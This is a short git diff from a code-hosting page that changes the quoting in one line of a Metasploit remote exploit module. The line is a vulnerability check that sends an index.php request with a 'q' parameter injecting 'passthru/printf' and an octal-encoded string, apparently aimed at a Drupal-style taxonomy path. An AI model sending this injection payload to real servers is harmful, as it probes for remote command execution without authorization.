parent
2e631cab5b
commit
32f1c83c9e
|
@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'method' => 'GET',
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
'vars_get' => {
|
||||
'q' => "taxonomy_vocabulary//passthru/printf \"#{Rex::Text.to_octal(r)}\""
|
||||
'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
|
||||
}
|
||||
)
|
||||
if res && res.body.include?(r)
|
||||
|
|
Loading…
Reference in New Issue